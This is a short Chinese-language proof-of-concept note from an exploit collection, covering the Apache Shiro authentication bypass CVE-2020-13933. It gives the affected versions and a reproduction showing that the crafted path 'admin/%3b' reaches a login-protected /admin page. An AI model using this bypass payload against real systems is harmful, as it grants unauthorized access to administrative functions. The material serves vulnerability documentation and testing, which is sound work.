Awesome-POC/中间件漏洞/Apache Shiro 1.6.0 身份认证绕过漏洞 CVE-2020-13933.md
2024-11-06 14:10:36 +08:00

25 lines
561 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Apache Shiro 1.6.0 身份认证绕过漏洞 CVE-2020-13933
## 漏洞描述
2020年8月18日Apache Shiro官方发布安全通告 Apache Shiro身份验证绕过漏洞CVE-2020-13933经过分析攻击者可以通过构造特殊的HTTP请求实现身份验证绕过。
## 漏洞影响
```
Apache Shiro < 1.6.0
```
## 漏洞复现
正常访问 /admin需要登录
![image-20230724162154509](images/image-20230724162154509.png)
构造恶意请求绕过:
```
admin/%3b
```
![image-20230724162320484](images/image-20230724162320484.png)